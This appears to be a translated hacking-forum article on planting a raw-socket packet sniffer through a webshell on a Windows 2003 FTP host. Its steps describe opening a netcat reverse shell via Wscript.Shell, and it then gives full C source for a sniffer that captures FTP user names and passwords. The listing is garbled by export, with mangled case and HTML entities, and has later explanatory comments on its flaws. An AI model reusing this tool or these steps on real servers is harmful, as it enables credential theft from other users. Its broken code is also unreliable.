Study on the feasibility of a Webshell-based sniffer (with figures) _ Vulnerability Research

Source: Internet
Author: User
Tags: sprintf, port number
Objective:
Phantom Mix modified Flashsky's port-multiplexing sniffer for Serv-U; I tested it and it cannot be used on a Win2003 server. I do not know the specific reason, nor whether it was a mistake in how I operated it; in any case, I did not succeed.
So I built an environment myself to try it out. The sniffer program is written by me and uses raw sockets for sniffing; sniffing via ARP would require installing WinPcap, which I think is impossible with low privileges.

Experimental environment:
Windows2003 Server + Ocean 2006+serv-u5.2
The server cannot run Cmd.exe directly, but files can be uploaded and commands executed through the Wscript.Shell component.

Experiment steps:
1. Use Wscript.Shell to run an NC reverse connection (bounce) and obtain a shell

2. Use the self-written tool for sniffing (I only sniff ports 21 and 9001, where 21 is FTP and 9001 is the reverse-connection port)

/*------------------------------------------------------
*file:snifferftp.c
*effect: used for sniffing experiments from a Webshell, based on raw sockets
*code:huai_huai
*page:http://hhuai.cn
*date:2006.1.12
*-----------------------------------------------------*/

#include <stdio.h>
#include <string.h>

#include "Winsock2.h"

#pragma comment (lib, "Ws2_32.lib")

// SIO_RCVALL = _WSAIOW(IOC_VENDOR, 1): the Winsock "receive all" IOCTL used
// by Startsniffer. (Identifier case throughout this listing was mangled by
// the page export; the real names are upper case.)
#define Sio_rcvall _wsaiow (ioc_vendor,1)
// Not referenced anywhere in the listing.
#define Status_failed 0xFFFF
// Largest IP datagram; Main repeats the literal 65535 instead of using this.
#define Max_pack_len 65535
// Room for a dotted-quad string (15 characters + NUL); Main hard-codes 16.
#define Max_addr_len 16
// Buffer size handed to gethostname in Startsniffer.
#define Max_hostname_len 255

// IP header overlay. Every multi-byte field is kept as a byte array in wire
// (big-endian) order, so Main rebuilds values by hand (hi * 0x100 + lo)
// instead of calling ntohs/ntohl.
typedef struct _IPHDR
{
BYTE Ver_len; // version 4 bits, header length 4 bits (in 32-bit words)
byte type; // type of service, 8 bits (`byte` vs `BYTE` is an export artefact)
BYTE length[2]; // total length, 16 bits: whole datagram in bytes;
// a datagram claiming more than 65,536 bytes is treated as damaged
BYTE id[2]; // identification, 16 bits, ties fragments of one datagram together
BYTE flag_offset[2];// flags 3 bits, fragment offset 13 bits
byte time; // time to live, 8 bits
BYTE Protocol; // protocol, 8 bits (Main compares this with PROTOCOL_TCP)
BYTE crc_val[2]; // header checksum, 16 bits
BYTE src_addr[4]; // source address, 32 bits
BYTE tar_addr[4]; // destination address, 32 bits
// Options are variable length on the wire; this fixed 4-byte field makes
// sizeof(ip_header) 24 rather than the minimum 20. Harmless here only
// because Main derives the header length from Ver_len, not from sizeof.
BYTE options[4]; // options and padding, 32 bits
}ip_header;

// TCP header overlay, same byte-array / wire-order convention as ip_header.
typedef struct _TCPHDR
{
BYTE source_port[2]; // source port, 16 bits
BYTE dest_port[2]; // destination port, 16 bits
BYTE sequence_no[4]; // sequence number, 32 bits: position of this segment's first data byte in the stream
BYTE ack_no[4]; // acknowledgement number, 32 bits: next byte the receiver expects from the sender
// Byte 12 of the header: data offset in the HIGH 4 bits (header length in
// 32-bit words), low bits reserved. Main computes the header length as
// `offset_reser_con >> 2`, which equals (offset >> 4) * 4 only while the
// reserved bits just below the offset are zero.
unsigned char offset_reser_con;// data offset 4 bits, reserved 6 bits, control bits 6 (author's note; the flags sit in th_flag below)
unsigned char th_flag; // control flags byte
BYTE window[2]; // window, 16 bits
BYTE checksum[2]; // checksum, 16 bits
BYTE urgen_pointer[2]; // urgent pointer, 16 bits
// Declared as 3 bytes although the comment says 32 bits; not used by the code.
BYTE options[3]; // options and padding, 32 bits
}tcp_header;

// IP protocol numbers with their RFC 790-era names. Only PROTOCOL_TCP is
// used by live code; the rest appear only in the commented-out switch in
// Main. From PROTOCOL_BRM onwards the macros carry NO value (they expand to
// nothing), so e.g. PROTOCOL_UDP (IANA number 17) would not compile if that
// switch were re-enabled.
#define PROTOCOL_ICMP 1 // Internet Control Message Protocol (the original comment wrongly said TCP)
#define PROTOCOL_GTG 3 // gateway-to-gateway
#define PROTOCOL_CGMM 4 // CMCC gateway monitoring message
#define PROTOCOL_ST 5 // ST
#define PROTOCOL_TCP 6 // Transmission Control Protocol
#define PROTOCOL_UCL 7 // UCL
#define Protocol_secure 9 // secure
#define PROTOCOL_BRM // BBN RCC Monitoring
#define PROTOCOL_NVP // NVP
#define PROTOCOL_PUP // PUP
#define Protocol_pluribus // Pluribus
#define Protocol_telenet // Telenet
#define Protocol_xnet // XNET
#define PROTOCOL_CHAOS // Chaos
#define PROTOCOL_UDP // UDP
#define Protocol_multiplexing // multiplexing
#define PROTOCOL_DCN // DCN
#define Protocol_tac_monitoring // TAC Monitoring
#define PROTOCOL_ALN // any local network
#define Protocol_satnet // SATNET and Backroom EXPAK
#define PROTOCOL_MITSS // MIT Subnet Support
#define PROTOCOL_SATNET_MONIT // SATNET Monitoring
#define PROTOCOL_IPCU // Internet Packet Core Utility
#define Protocol_bk_satnet_moni // Backroom SATNET Monitoring
#define Protocol_wideband_moni // Wideband Monitoring
#define PROTOCOL_WIDEBAND_EXPAK // Wideband EXPAK

// Raw socket shared by Startsniffer (creates and binds it) and ReceiveBuf
// (reads from it). It is closed only on the failure paths; the success path
// in Main loops forever and never releases it.
SOCKET Socketraw;

// Initialises Winsock, opens the global raw socket, binds it to the first
// address of the local host and switches it to receive-all mode.
// (Case-mangled listing: `Char`, `Wsadata`, `Sockaddr_in`, `Makeword`,
// `&AMP;`, `Exit`, `Bind`, `Closesocket`, `psockaddr`, `null` and the missing
// '(' after WSAIoctl are artefacts of the page export.)
// Side effects: assigns Socketraw. On every failure it prints a message and
// calls exit(0) -- a *success* status although setup failed, and without
// WSAGetLastError(), so the operator cannot tell why it failed.
void Startsniffer ()
{
// Unused 64 KiB stack array (Main has its own receive buffer).
Char recvbuf[max_pack_len]={0};
Char FAR Name[max_hostname_len];
Wsadata WSA;
struct hostent far* phostent;
Sockaddr_in sa;
// Filled by WSAIoctl but never read.
DWORD OUTBUFFER[10];
// 1 = enable receive-all mode.
DWORD inbuffer=1;
DWORD bytesreturned=0;

if (WSAStartup (Makeword (2,2), &AMP;WSA)!=0)
{
printf ("Cannot load Winsock dll!");
Exit (0);
}
// SOCK_RAW/IPPROTO_IP delivers whole IP datagrams, header included, which is
// why Main overlays ip_header at offset 0 of the receive buffer.
Socketraw=socket (AF_INET,SOCK_RAW,IPPROTO_IP);
if (Socketraw==invalid_socket)
{
printf ("Cannot create socket!");
Exit (0);
}


// Return value (SOCKET_ERROR) is not checked, so Name may be left unset.
GetHostName (Name,max_hostname_len);

// phostent points to a Winsock-owned buffer (do not free). A NULL result
// (lookup failure) is not checked and is dereferenced a few lines below.
Phostent=gethostbyname (name);

Sa.sin_family=af_inet;
// The bind selects the interface that the receive-all IOCTL applies to. The
// port is carried along but is presumably meaningless for a raw IP socket
// -- verify against the Winsock documentation.
Sa.sin_port=htons (6000);
// Copies h_length bytes (4 for AF_INET) of the first address into sin_addr.
memcpy (&sa.sin_addr. S_un. S_addr,phostent->h_addr_list[0],phostent->h_length);
if (Bind (Socketraw, (psockaddr) &sa,sizeof (sa))!=0)
{
printf ("Cannot bind NIC!");
Closesocket (Socketraw);
Exit (0);
}



// SIO_RCVALL puts the bound interface into receive-all mode so that every
// IPv4 datagram seen on it is delivered to this socket. Microsoft documents
// this IOCTL as requiring administrator privilege on the local computer,
// which bears directly on the article's "very low privilege" claim; from a
// defender's view a process issuing SIO_RCVALL is the host-level observable.
if (WSAIoctl socketraw,sio_rcvall,&inbuffer,sizeof (Inbuffer),
&outbuffer,sizeof (Outbuffer), &bytesreturned,null,null)!=0)
{
printf ("Cannot create wsaioctl!");
Closesocket (Socketraw);
Exit (0);
}

}

// Thin wrapper over recv() on the global raw socket.
// buf: destination buffer; len: its capacity in bytes.
// Returns the number of bytes received, 0, or SOCKET_ERROR; the only caller
// (Main) tests for > 0, so errors are silently skipped.
// (`byte*` and `Return` are export artefacts for `BYTE*` and `return`.)
int ReceiveBuf (byte* buf,int len)
{
Return recv (Socketraw, (char *) buf,len,0);
}

// Program entry point (non-standard `void main`). The listing's case was
// mangled by the page export: `Main`, `Len`, `Hdrlen`, `Char`, `Recvbuf`,
// `| |`, `-&GT;`, `&AMP;`, `src_addr[2)` and `"\ n"` stand for `main`,
// `len`, `hdrlen`, `char`, `recvbuf`, `||`, `->`, `&`, `src_addr[2]` and
// `"\n"`.
// Flow: open the raw socket once, then loop forever: receive one IP
// datagram, keep TCP only, print both ports, and for port 21 / 9001 traffic
// print the TCP payload, both addresses and the IP total length.
// There is no exit path and Socketraw is never closed.
void Main ()
{
int Len;
// Second 64 KiB stack buffer (Startsniffer has its own); the literal 65535 is
// repeated below instead of Max_pack_len.
BYTE recvbuf[65535];
// 16-byte scratch buffer reused for every sprintf below: large enough for a
// dotted-quad address (15 chars + NUL) or a port, NOT for a packet payload.
Char buf[16];
int Iphdr_len;
tcp_header* Ptcpheader;
unsigned __int16 src_port;
unsigned __int16 dest_port;
int Hdrlen;
// Signed 16-bit: an IP total length of 32768 or more prints as negative.
__int16 Datalen;
ip_header* Pipheader;
int port1,port2;

Startsniffer ();
while (TRUE)
{
port1=port2=0;
// Zeroing the buffer is what later gives the "%s" payload print its NUL
// terminator; a datagram that fills all 65535 bytes leaves none.
memset (recvbuf,0,65535);
Len=receivebuf (recvbuf,65535);
// SOCKET_ERROR (negative) and 0 both fall through to the next iteration.
if (len>0)
{

// No check that len covers an IP header before the struct overlay is read.
Pipheader= (ip_header*) recvbuf;
/*
Switch (PIPHEADER-&GT;PROTOCOL)
{
Case PROTOCOL_ICMP:
printf ("ICMP");
Break
Case PROTOCOL_TCP:
printf ("TCP");
Break
Case PROTOCOL_UDP:
printf ("UDP");
Break
Default
printf ("other agreements");
Break
}
*/



if (PIPHEADER-&GT;PROTOCOL==PROTOCOL_TCP)
{
// IP header length = IHL (low nibble of the first byte) * 4 bytes. It is
// not validated against len, so Ptcpheader may point past the received bytes.
Iphdr_len= (PIPHEADER-&GT;VER_LEN&AMP;0XF) *4;
Ptcpheader= (tcp_header*) (Recvbuf+iphdr_len);
// Hand-rolled big-endian to host conversion (what ntohs would do).
src_port=ptcpheader->source_port[0]*0x100+ptcpheader->source_port[1];
dest_port=ptcpheader->dest_port[0]*0x100+ptcpheader->dest_port[1];

// A port is at most 5 digits, so these two sprintf calls fit buf.
memset (buf,0,16);
sprintf (buf, "%d", src_port);
Port1=src_port;
printf ("%s", buf);

memset (buf,0,16);
sprintf (buf, "%d", dest_port);
Port2=dest_port;
printf ("%s", buf);

// Only FTP (21) and the reverse-connection port (9001) from step 2 are inspected.
if (port1==21 | | port2==21 | | port1==9001 | | port2==9001)
{
// The TCP data offset lives in the HIGH nibble of this byte (see tcp_header);
// (x >> 4) * 4 is the header length in bytes. `x >> 2` gives the same value
// only while the reserved bits below the offset are zero, and the result is
// never checked against the bytes actually received.
Hdrlen= (Ptcpheader->offset_reser_con) >>2;
memset (buf,0,16);
// DEFECT: unbounded "%s" copy of remote-controlled packet payload into a
// 16-byte stack buffer. Any payload longer than 15 bytes (an ordinary FTP
// banner line already is) overruns buf; the copy must be bounded to
// sizeof buf - 1.
sprintf (buf, "%s", ((BYTE *) ptcpheader) +hdrlen);
printf ("%s", buf);

// Dotted quad: at most 15 characters, so it fits buf exactly.
memset (buf,0,16);
sprintf (buf, "%d.%d.%d.%d", pipheader->src_addr[0],pipheader->src_addr[1],pipheader->src_addr[2), PIPHEADER-&GT;SRC_ADDR[3]);
printf ("%s", buf);

memset (buf,0,16);
sprintf (buf, "%d.%d.%d.%d", pipheader->tar_addr[0],pipheader->tar_addr[1],pipheader->tar_addr[2), PIPHEADER-&GT;TAR_ADDR[3]);
printf ("%s", buf);



// IP total length, again rebuilt by hand from the two wire-order bytes.
datalen=pipheader->length[0]*0x100+pipheader->length[1];
memset (buf,0,16);
sprintf (buf, "%d", datalen);
printf ("%s", buf);

// Repeats the same unbounded payload copy and print from above.
Hdrlen= (Ptcpheader->offset_reser_con) >>2;
memset (buf,0,16);
sprintf (buf, "%s", ((BYTE *) ptcpheader) +hdrlen);
printf ("%s", buf);
printf ("\ n");

}
}
}

}
}

3. Sniffing results:


[Image: /college/uploadpic/2006/8/27/2006827234138485.jpg — click opens /pic/22/a2006-3-1-621a6f.jpg at full size]


4. Experimental Summary:
It can indeed sniff some information: on my local WinXP SP2 it can sniff the FTP password, but when run on the Win2003 server it can only sniff the user name; through the Webshell it can likewise sniff the user name and some operations, such as the user's directory.
Our Webshell privilege can be very low; it is enough to be able to use Wscript.Shell.
There are many details that need careful research; I very much hope the forum masters can give a few hints. (Source: Evil Octal Information Security Team; Author: bad)
